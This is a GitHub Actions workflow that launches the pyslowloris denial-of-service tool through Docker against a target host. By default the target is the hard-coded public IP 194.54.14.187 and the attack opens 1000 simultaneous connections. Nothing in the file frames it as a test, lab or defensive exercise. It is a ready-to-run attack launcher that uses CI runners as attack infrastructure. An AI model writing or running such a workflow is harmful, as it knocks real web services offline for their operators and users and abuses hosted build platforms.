name: PYSlowloris workflow

on:
  workflow_dispatch:
    inputs:
      ip:
        description: 'IP/DNS of the target web resource (without http:// and https:// !!!)'
        default: '194.54.14.187'
        type: string
        required: false
      conections:
        description: 'Amount of simultaneous connections'
        default: '1000'
        type: string
        required: false
jobs:
  docker-run:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          docker run --rm maxkrivich/pyslowloris -u http://${{ github.event.inputs.ip }} -s ${{ github.event.inputs.conections }}
